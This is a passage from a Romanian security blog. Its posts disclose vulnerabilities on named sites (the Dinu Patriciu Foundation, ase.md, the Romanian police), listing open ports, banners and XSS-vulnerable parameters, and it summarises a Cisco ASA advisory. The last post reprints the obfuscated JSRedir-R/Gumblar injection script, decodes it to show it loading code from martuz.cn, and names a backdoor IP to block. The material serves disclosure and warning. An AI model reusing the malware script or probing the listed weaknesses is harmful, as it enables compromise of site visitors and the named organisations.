Site-ul Fundatiei Dinu Patriciu – scopuri OK…realizare…KO

In general nu caut nod in papura nimanui… Cu atat mai putin unei fundatii care a facut si face destule lucruri buna intr-o rromanica plina de …….. Completati voi punctele cu ce va trece prin cap!

Totusi, va trebui sa critic putin modul in care a fost construit site-ul Fundatiei Dinu Patriciu, manscand  informatiile sensibile, astfel incat sa nu oferim mai mult decat trebuie vitejilor cu anumite cunostinte IT…

Ca prezentare, site-ul e clar si functional. Problemele rezida insa in modul cum au fost protejati anumiti parametri, si, mai ales in update-urile atat de necesare unui server web…

Haideti sa luam problemele pe rand:

1.Utilizare SSL2… Intre timp a aparut SSL3 sau chiar TLS, mult mai puternice si versatile… Consecinte?

SSL2_CK_RC4_128_EXPORT40_WITH_MD5 – Low strength
SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5 – Low strength
SSL2_CK_DES_64_CBC_WITH_MD5 – Low strength

!Prietenii stiu de ce!

2.MySQL Enterprise Server v.5.0.52… Consecinte?

Folosind RENAME TABLE intr-un tabel cu optiunile explicite DATA DIRECTORY si INDEX DIRECTORY se poate suprascrie informatia din tabel.

ALTER VIEW retine valuarea originala a DEFINER , chiar daca este modificata de alt utilizator, ceea ce inseamna acces catre datele de output.

Cand se foloseste un tabel FEDERATED , serverul local crapa atunci cand serverul remote intoarce un rezultat cu mai putine coloane decat trebuie.

3.DNS zone transfer….adica serverul de DNS accepta transferul de zone… asta chiar mi-a placut!!! Individual, datele din inregistrarile DNS nu sunt foarte importante, dar… avand toate intrarile DNS e mult mai usor pentru un hacker sa vada exact ce domenii sunt pe server, si mai ales ce are de atacat…

4. XSS… ca de obicei, si in URL si in scriptul de cautare si cel de contact:

5. MySQL Community Server Symlink Attack Vulnerability… nu dau amanunte, prietenii stiu de ce… Presupun ca vreunul din cei ce administreaza pagina si-a lasat o portita de scapare in caz ca nu-l plateste Don Patriciu…

Sper sa le rezolve cat mai repede…..

P.S. Odata cu publicarea articolului i-am anuntat si pe cei din Fundatie, care presupun ca au trimis mail-ul mai departe catre persoana responsabila de pagina web … De aici incepe distractia, intrucat individul, dovedind o reala lipsa de cojones si un caracter cat se poate de josnic, se foloseste de numele si adresa de mail a lui Valentin Ivascu, un programator php pe care il stiu dupa reputatie, si imi lasa doua comentarii amuzante… le puteti citi aici…

Am incercat sa-i explic individului ca, de obicei, pentru asa ceva se multumeste… Din pacate cred ca nu stie ce e aia…

Ca exemplu ii pot da pe cei de la trilulilu.ro, pe care i-am anuntat ca au cateva probleme cu SQL injection, si care au stiut sa multumeasca pentru informatii… Acesta este de altfel si motivul pentru care nu am publicat nimic despre vulnerabilitatile de pe trilulilu.ro…

Un salut trilulitilor, si un “rusinica” d-lui programator/secretarei/celor de la fundatie/etc… !

 

CISCO ASA – vulnerabilitati

Cisco a confirmat zilele trecute existenta a doua vulnerabilitati in platforma de securitate. Una dintre ele, destul de grava, profita de o greseala de validare in momentul procesarii URL-urilor codificate cu Rot13 in SSL VPN. Teoretic, se poate folosi vulnerabilitatea pentru a initia un atac  de Cross Site Scripting.

Cea de-a doua vulnerabilitate, destul de asemanatoare, se foloseste de o greseala de programare in validarea intrarilor in WebVPN. Tot teoretic, se poare rescrie primul caracter hexadecimal al unui URL Cisco… Restul vi-l imaginati singuri…

ORicum, problemele au fost rezolvate in versiunile 8.0.4.34 si 8.1.2.25, care pot fi decarcate de la:

http://www.cisco.com/public/sw-center
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

 

ASE.md

Va promiteam aici un articol ceva mai detaliat despre cum functioneaza partea online a prestigioasei “Academii de Studii Economice” din republica Moldova…

Hai sa vedem cateva dintre problemele pe care le are platforma (joomla- usor modificata) folosita de fratii nostri de peste Prut:

• Prea multe porturi deschise si necapate:

1. 22- ssh – open – banner: SSH-2.0- OpenSSH_4.7p1 Debian-8ubuntu1.2 – cunoscut cu destule vulnerabilitati…
2. 21 – ftp – open
3. 25- smtp – open – banner: ase.md ESMTP Postfix
4. 53 – domain – open
5. 80 – http- open – folosind variante invechite de Apache si PHP
6. 110 – pop3 – open
7. 143 – imap – open
8. 443 – https – open – folosind variante inchevite de SSL
9. 10000 – snet-sensor-mgmt

• SSH-ul, dupa cum spuneam este depasit. Server key fingerprint: b160672a5b6257989a9be64621f76275. Algoritmul de SSH client-server este in AES de 128. HMAC-ul este un SHA de 256. Certificatul utilizeaza un RSA cu MD2 digest.
• Cross site scripting in index.php, news.php si search.php, cel mai afectat fiind ultimul – search.php, unde am incercat 24 devariante, toate cu succes…
• Proxy-ul accepta requesturile de CONNECT
• mod_ssl din Apache vulnerabil la Binary Stack Buffer Overflow
• Se pot manipula cookie-urile in search.php, care de altfel se pare ca este cel mai vulnerabil script de pe site
• TRACE Method Enable – afecteaza doar serverul de web

Sa nu mai vorbim si de transmiterea in text clar a datelor utilizatorilor, care afecteaza aproape toate fisierele php active.

Parametrul vulnerabil din index.php este retornto de tip POST.

In news.php exista vaiabil page, de tip GET, pe care au fost incercate diferite combinatii. Vulnerabil la marea majoritate…

Search.php are un parametru POST numit q si implementat absolut iresponsabil. E greu sa gasesti o combinatie de cod care sa nu dea rezultate….

Daca as incepe sa scriu toate variantele de cod pe care le-am incercat si au functionat, probabil ar fi cel mai lung post scris vreodata pe un blog… Asa ca ma opresc aici ,cu speranta ca fratii nostri de peste Prut vor incerca sa remedieze cat mai repede problemele pe care le au…

 

Politia romana… un mic XSS

I-am avertizat acum 2 zile… Sper ca au rezolvat-o. Oricum, un mic multumesc nu strica imaginea nimanui…

 

JSRedir-R si specialistii…

de la neworkworld.ro…

Descoperind astazi ca exista in internetul romanesc si un “Filtru tematic al blogosferei“, lucru de apreciat daca ar exista si posibilitatea de a afla ce algoritm folosesc baietii pentru a agrega blogurile, am ajuns, din link in link,  sa citesc un articolas interesant despre JSRedir-R pe site-ul celor de la networkworld. Informatiile sunt relativ OK, cu mici ajustari si precizari:

• Site-ul Gumblar.cn este inactiv de ceva vreme…din motive de baieti buni
• Noul redirect se face catre site-ul Martuz.cn
• Scripul buclucas arata cam asa:(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();
• Dupa cum observati scriptul e codat, dar versiunea in clar arata cam asa: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}
• Martuz.cn e concatenat in diverse variante ca cea de mai sus “martu”+”z.cn”, asa ca aveti grija cum il cautati in coduri
• Teoretic, utilizatorii de Google Chrome sunt primii care afla daca o pagina este sau nu infectata, datorita functiilor implementate in browser, dar nu va bazati pe asta…
• Din cand in cand mai instaleaza si un backdoor care se conecteaza la IP-ul 78 .109 .29 .112… N-ar fi rau sa-l blocati din firewall

Nu-i chiar asa de greu sa te documentezi, nu?